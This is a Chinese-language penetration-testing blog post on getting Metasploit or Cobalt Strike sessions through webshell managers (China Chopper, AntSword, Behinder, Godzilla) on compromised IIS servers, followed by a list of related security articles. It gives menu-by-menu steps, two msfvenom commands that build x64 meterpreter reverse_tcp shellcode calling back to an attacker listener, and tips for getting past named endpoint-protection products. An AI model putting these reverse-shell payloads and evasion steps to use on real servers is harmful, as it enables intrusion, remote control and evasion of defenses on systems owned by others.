常用Webshell管理工具上线利用方式

简介: 常用Webshell管理工具上线利用方式


前言

这篇文章我们主要介绍的是如何利用常用Webshell管理工具中的自定义代码执行功能来上线MSF,附带了中国蚁剑、冰蝎和哥斯拉的内存加载上线,实战渗透中如果遇到以下场景时可尝试文中方法绕过。


利用场景

仅支持ASP,WScript.Shell、Shell.Application组件被卸载;又或者支持ASP.NET,但是存在有某些安全防护软件(360、云锁、安全狗等),在这两种场景下可能无法执行命令、上线和提权等。


注:目前国内大部分安全防护软件都会对某些进程或进程链的监控较为严格,如果遇到这类场景时可尝试使用以下方式来绕过,但过不了D盾,因为Hook掉了一些上线所需的API,其他防护软件还请自测。


0x01 中国菜刀

中国菜刀中并没有直接上线和shellcode加载功能,但是有一个自定义代码执行,我们可以利用这个功能来获取MSF会话。


选择对应Webshell -> 右键“自写脚本”-> 执行ASP脚本上线。


0x02 中国蚁剑

中国蚁剑和菜刀一样,也可以利用As-Exploits后渗透插件中的执行自定义Payload功能来获取MSF会话。


选择对应Webshell -> As-Exploits -> 执行自定义Payload -> 执行ASP脚本上线。


如果目标主机支持ASP.NET和JSP脚本,我们也可以利用As-Exploits插件中的ShellCode加载器功能来上线CS或MSF,只需生成hex格式的shellcode即可,c、csharp的还需要做些处理。

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=443 -f hex


    注:JSP内存加载方式有两种:JNA、Attach,JNA只需要X86的ShellCode即可,而Attach需要根据目标Java位数来选择对应的ShellCode,更多注意事项可在As-Exploits插件中查看。

    0x03 冰蝎

    冰蝎不仅可以利用自定义代码执行功能来获取MSF会话,也可以使用反弹shell功能来获取CS/MSF会话,但是不支持ASP脚本。


    连接Webshell -> 自定义代码 -> 执行ASP脚本上线。


    利用反弹shell功能获取会话时只需在Metasploit、CobaltStrike工具中设置好监听,然后在冰蝎客户端中填写VPS监听的公网IP地址和端口就行了,这也能用于目标不出网等场景。


    注:反弹shell中的Meterpreter和Shell内置的是x86的shellcode,不可自定义shellcode,如果IIS应用池为64位时可能无法上线,更换x64的Payload也不行,但可以反弹CobaltStrike。


    0x04 哥斯拉

    目标仅支持ASP脚本时我们可以利用哥斯拉中的代码执行功能来获取MSF会话,加密器用的ASP_RAW,其他的加密器还请自测。


    连接Webshell -> 代码执行 -> 执行ASP脚本上线。


    如果支持ASP.NET脚本时我们也可以利用内存加载中的ShellcodeLoader、Meterpreter来获取会话,哥斯拉会根据IIS应用池位数来加载对应的shellcode,不会出现x64上线不了等情况。


    利用ShellcodeLoader获取会话时需要先生成一个C的shellcode,将\x"及多余字符都删掉,只需留下hex shellcode即可,然后再依次点击load加载和run运行就能获取到会话。

      msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=443 -f c


      注:ShellcodeLoader、Meterpreter都是在w3wp.exe进程下重新创建一个新的rundll32.exe,所以这过不了安全狗“禁止IIS执行程序”,提示Cannot create process errcode:5

      0x05 文末小结

      本文介绍了4个常用Webshell管理工具的上线方式,都是注入到进程内存中去执行的,1种是注入到w3wp.exe进程;另1种是注入到指定进程,但是是由w3wp.exe创建的子进程,如果防护软件对w3wp.exe进程监控较为严格时则可能无法利用,如安全狗“禁止IIS执行程序”、云锁“操作系统加固”等防护功能。

      相关文章
      |
      5月前
      |
      安全 小程序 PHP
      PHP代码审计(七)Rips源代码审计系统使用教程
      上一篇中提到的Seay源代码审计系统是由C#编写的winform程序,现在已经停止更新了,但是,还是比较好用的。 PHP代码审计还有另一个工具,也是一个神器Rips
      160 0
      |
      5月前
      |
      安全 小程序 PHP
      PHP代码审计(六)Seay源代码审计系统使用教程
      www.cnseay.com/ 当然,这个已经不能访问了。 软件的版本比较早,需要.NET framework3.5框架,我这里是软件启动的时候自动提醒安装,如果没有自动提醒,那么你需要手动安装.NET frameWork3.5框架,否则,程序应该是没有办法运行。
      293 0
      |
      5月前
      |
      SQL 监控 数据库连接
      实现基于内网管理监控软件的用户身份验证系统的PHP代码详解
      随着信息技术的不断发展,内网管理监控软件的需求也日益增长。为了确保系统的安全性,用户身份验证成为了至关重要的一环。本文将详细介绍如何通过PHP代码实现基于内网管理监控软件的用户身份验证系统,并提供一些代码示例。
      230 0
      |
      存储 安全 开发者
      企业用WordPress开发插件需要定期更新吗?
      企业使用WordPress开发插件时,需要定期更新插件以确保插件的安全性和兼容性。 插件开发者会定期发布更新来修复漏洞、改进功能和确保兼容性。如果插件没有及时更新,那么它可能会存在漏洞或与最新版本的WordPress或其他插件不兼容,从而导致安全和性能问题。除了定期更新插件以确保安全性和兼容性,企业在使用WordPress插件时还有以下一些最佳实践:
      |
      安全 测试技术 数据安全/隐私保护
      |
      关系型数据库 MySQL 测试技术
      安全测试之--DVWA渗透测试演练系统环境搭建
      DVWA是一款渗透测试的演练系统,在圈子里是很出名的。
      安全测试之--DVWA渗透测试演练系统环境搭建
      |
      安全 Linux PHP
      PrestaShop 网站漏洞详情与漏洞修复办法
      PrestaShop网站的漏洞越来越多,该网站系统是很多外贸网站在使用的一个开源系统,从之前的1.0初始版本到现在的1.7版本,经历了多次的升级,系统使用的人也越来越多,国内使用该系统的外贸公司也很多,PrestaShop扩展性较高,模板也多,多种货币自由切换,并支持信用卡以及paypal支付,是外贸网站的首选。就在最近几天,PrestaShop被爆出有远程代码注入漏洞,该漏洞影响范围较光,危害较大,可以上传webshell到网站根目录下。
      236 0
      PrestaShop 网站漏洞详情与漏洞修复办法
      |
      安全 Unix Linux
      用于Linux服务器的自动安全审计工具
      用于Linux服务器的自动安全审计工具
      用于Linux服务器的自动安全审计工具
      |
      PHP SEO Apache
      php网站开发步骤
       PHP作为开源语言,发展至今已有很多成熟的国内外开源系统,足以满足个人和企业用户自己建立WEB站点,下面则主要介绍PHP做网站的步骤和流程。   不管使用PHP建立个人还是企业网站,网站建设的流程规范大体是一致的,涉及域名注册,服务器(空间)选择,了解用户需求,网站定位,PHP建站程序的选择与开发等流程。
      1302 0